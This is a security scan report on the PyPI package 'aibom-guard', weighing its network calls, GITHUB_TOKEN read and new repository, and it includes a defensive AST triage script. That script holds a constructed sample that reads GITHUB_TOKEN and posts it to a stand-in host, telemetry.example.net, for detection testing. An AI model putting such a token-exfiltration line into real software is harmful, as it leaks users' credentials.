aibom-guard

v0.2.0 | verdict: suspicious | risk score 6.0 | Medium Risk

AI Bill of Materials generation + EU AI Act / ISO 42001 / NIST AI RMF compliance triage

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package's functionality looks plausibly legitimate, but three signals together keep it at SUSPICIOUS: the repository is only days old, all commits landed within 24 hours, and the code reads a GITHUB_TOKEN from the environment.

  • Recent repository creation with a rapid, single-day commit history
  • Reads GITHUB_TOKEN from an argument or the environment; routine for GitHub API authentication, a concern only if the token is sent anywhere other than the GitHub API
Per-check LLM notes
  • Network: The package makes HTTP requests with urllib.request. One visible target is a schema URL held in the `_CDX_SCHEMA_URL` constant, which a BOM generator would plausibly fetch to validate its own output; the other request URLs are not visible in the quoted snippets, so the remaining destinations should be confirmed before treating the network activity as benign.
  • Shell: No shell execution patterns were detected.
  • Obfuscation: No obfuscation patterns detected in the provided code snippet.
  • Credentials: The code takes a token from a function argument and falls back to the GITHUB_TOKEN environment variable. That is the standard way to authenticate to the GitHub API and is not harvesting by itself; the quoted snippets do not show which host the token is sent to, so confirm it is only attached to requests to api.github.com (or your GitHub Enterprise host) before dismissing this flag.
  • Metadata: The repository was created days ago and all commits happened within a short window. This is the profile of both a throwaway or malicious upload and a genuinely new project, so it is a weak signal on its own and mainly raises the bar for the other checks.

📦 Package Quality Overall: Medium (5.0/10)

✦ High Test Suite 9.0

Test suite present — 1 test file(s) found

  • Test runner config found: pyproject.toml
  • 1 test file(s) detected (e.g. test_pipeline.py)
◈ Medium Documentation 7.0

Some documentation present

  • Documentation URL: "Documentation" -> https://github.com/AnousonePhyakeo/aibom-guard#readme
  • Detailed PyPI description (9423 chars)
○ Low Contributing Guide 2.0

No contributing guide or governance files found

  • No CONTRIBUTING, CODE_OF_CONDUCT, or governance files found
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 38 type-annotated function signatures detected in source
○ Low Multiple Contributors 2.0

Single-author or unverifiable project

  • 1 unique contributor(s) across 8 commits in AnousonePhyakeo/aibom-guard
  • Single author with few commits — possibly a personal or throwaway project

🔬 Heuristic Checks

Outbound Network Calls score 7.5

Found 5 network call pattern(s)

  • list: try: req = urllib.request.Request(url, headers=headers) with urllib.request.ur
  • headers=headers) with urllib.request.urlopen(req, timeout=_TIMEOUT) as resp: return j
  • l_id}" try: req = urllib.request.Request( url, headers={"User-Agent":
  • son"}, ) with urllib.request.urlopen(req, timeout=_TIMEOUT) as resp: data = j
  • request try: with urllib.request.urlopen(_CDX_SCHEMA_URL, timeout=8) as resp: sch
Code Obfuscation

No obfuscation patterns detected

Shell / Subprocess Execution

No shell execution patterns detected

Credential Harvesting score 2.5

Found 1 credential access pattern(s)

  • """ token = token or os.environ.get("GITHUB_TOKEN", "") if not token: return { "sourc
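The Outbound Network Calls and Credential Harvesting checks above are grep-style: they match `urllib.request` calls and `GITHUB_TOKEN` reads separately and leave the reviewer to connect them. The following is an added example (not aibom-guard's code and not the scanner's) of the check a practitioner would actually want: a small AST pass that lists credential-looking reads via `os.environ.get`/`os.getenv` and the host each `urllib.request.Request`/`urlopen` call targets, then returns a verdict based on whether every host is on an expected-API allowlist (defaulting to `api.github.com`, an assumption). It resolves only string literals, f-string prefixes and simple constant assignments; anything else is reported as `<dynamic>` and counts as needing review. The two sample sources are constructed to mirror the pattern the scan quotes.

```python
import ast
from urllib.parse import urlparse

CREDENTIAL_HINTS = ("TOKEN", "SECRET", "PASSWORD", "API_KEY", "APIKEY")
REQUEST_FUNCS = {"Request", "urlopen"}  # urllib.request.Request / urlopen

def _callee(call):
    # Called name: 'Request' for urllib.request.Request(...), 'get' for x.get(...).
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)

def _string_prefix(node, consts):
    """Static value of a string expression (for an f-string, its resolvable prefix), or None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.Name):
        return consts.get(node.id)
    if isinstance(node, ast.JoinedStr):
        out = ""
        for part in node.values:
            inner = part.value if isinstance(part, ast.FormattedValue) else part
            piece = _string_prefix(inner, consts)
            if piece is None:
                break  # f"{API}/repos/{owner}" -> "https://api.github.com/repos/"
            out += piece
        return out or None
    return None

def _env_var_name(call):
    """Env var read by os.environ.get(X, ...) or os.getenv(X), else None."""
    f = call.func
    via_environ = (isinstance(f, ast.Attribute) and f.attr == "get"
                   and isinstance(f.value, ast.Attribute) and f.value.attr == "environ")
    if not (via_environ or _callee(call) == "getenv") or not call.args:
        return None
    arg = call.args[0]
    return arg.value if isinstance(arg, ast.Constant) and isinstance(arg.value, str) else None

def _is_credential(var):
    return any(hint in var.upper() for hint in CREDENTIAL_HINTS)

def triage(source, allowed_hosts=("api.github.com",)):
    """Credential env reads, urllib request hosts and a verdict for `source`."""
    tree = ast.parse(source)
    # Pass 1: `name = <string-ish>` in source order (later ones may reuse earlier
    # constants), plus the variables bound to a Request object.
    consts, request_vars = {}, set()
    for a in sorted((n for n in ast.walk(tree) if isinstance(n, ast.Assign)),
                    key=lambda n: n.lineno):
        if len(a.targets) == 1 and isinstance(a.targets[0], ast.Name):
            lit = _string_prefix(a.value, consts)
            if lit is not None:
                consts[a.targets[0].id] = lit
            elif isinstance(a.value, ast.Call) and _callee(a.value) == "Request":
                request_vars.add(a.targets[0].id)
    env_reads, hosts = [], []  # Pass 2: credential reads and request targets.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            var = _env_var_name(node)
            if var and _is_credential(var):
                env_reads.append((node.lineno, var))
            if _callee(node) in REQUEST_FUNCS and node.args:
                first = node.args[0]
                if isinstance(first, ast.Name) and first.id in request_vars:
                    continue  # urlopen(req): already counted at Request(...)
                url = _string_prefix(first, consts)
                host = urlparse(url).hostname if url else None
                hosts.append((node.lineno, host or "<dynamic>"))
    unexpected = sorted({h for _, h in hosts if h not in allowed_hosts})
    if not env_reads:
        verdict = "no-credential-read"
    elif not hosts:
        verdict = "credential-read-no-network"
    elif not unexpected:
        verdict = "credential-to-allowed-hosts-only"
    else:
        verdict = "review"
    return {"verdict": verdict, "env_reads": env_reads, "hosts": hosts,
            "unexpected_hosts": unexpected}

# Constructed samples, not aibom-guard's code. LEGIT_SRC mirrors the pattern the
# scan quotes: token from an argument or GITHUB_TOKEN, sent only to the GitHub API.
LEGIT_SRC = '''
import json, os, urllib.request
API = "https://api.github.com"
def fetch_repo(owner, repo, token=None):
    token = token or os.environ.get("GITHUB_TOKEN", "")
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    req = urllib.request.Request(f"{API}/repos/{owner}/{repo}", headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)
'''
# EXFIL_SRC: the same credential read, but the token is posted to an unrelated host.
EXFIL_SRC = '''
import os, urllib.request
def sync_settings():
    token = os.getenv("GITHUB_TOKEN")
    urllib.request.urlopen("https://telemetry.example.net/collect", data=(token or "").encode())
'''
```

`triage(LEGIT_SRC)` reports the GITHUB_TOKEN read and a single host, `api.github.com`, and returns the verdict `credential-to-allowed-hosts-only`; `triage(EXFIL_SRC)` returns `review` with `telemetry.example.net` as the unexpected host. Pass a different `allowed_hosts` for GitHub Enterprise. The approach is deliberately conservative: a URL built from a function parameter or a runtime value is reported as `<dynamic>` rather than guessed, so it lands in the review bucket instead of being silently cleared.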
Typosquatting

No typosquatting candidates detected

Registered Email Domain

Email domain looks legitimate: gmail.com (a free-mail domain, so this only rules out a non-existent or throwaway-looking domain; it says nothing about who controls the account)

Suspicious Page Links

All external links appear legitimate

Git Repository History score 7.5

3 git history flag(s) found

  • Repository created very recently: 4 day(s) ago (2026-06-03T03:00:12Z)
  • Repository has zero stars and zero forks
  • All 8 commits happened within 24 hours
Maintainer History score 6.0

3 maintainer concern(s) found

  • Only one version has ever been released — brand new package
  • Author name is missing or very short
  • Author "" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with aibom-guard
Create a mini-application named 'AI Compliance Buddy' that leverages the 'aibom-guard' Python package to assist developers and organizations in ensuring their AI projects comply with various regulatory frameworks such as the EU AI Act, ISO 42001, and NIST AI RMF standards. The application should include the following features:

1. **AI Bill of Materials (BoM) Generation**: Users should be able to input details about their AI project components (e.g., datasets, models, libraries), and the app should generate a comprehensive BoM that lists all components and their respective versions.

2. **Compliance Triage**: After generating the BoM, the application should analyze each component against the mentioned regulatory frameworks and provide a summary of compliance status for each framework.

3. **Actionable Recommendations**: For components that do not meet compliance requirements, the application should offer actionable recommendations on how to address non-compliance issues.

4. **Integration with Version Control Systems**: Allow users to integrate their local or remote version control systems (e.g., Git) to automatically update the BoM when changes are made to the project's dependencies.

5. **User-Friendly Interface**: Develop a simple yet intuitive web-based interface using Flask or Django for the application, making it accessible and user-friendly.

The 'aibom-guard' package will be utilized to handle the core functionalities of generating the BoM and performing the compliance triage. Your task is to design and implement this application from scratch, including setting up the environment, integrating the 'aibom-guard' package, developing the necessary backend logic, and creating the frontend interface.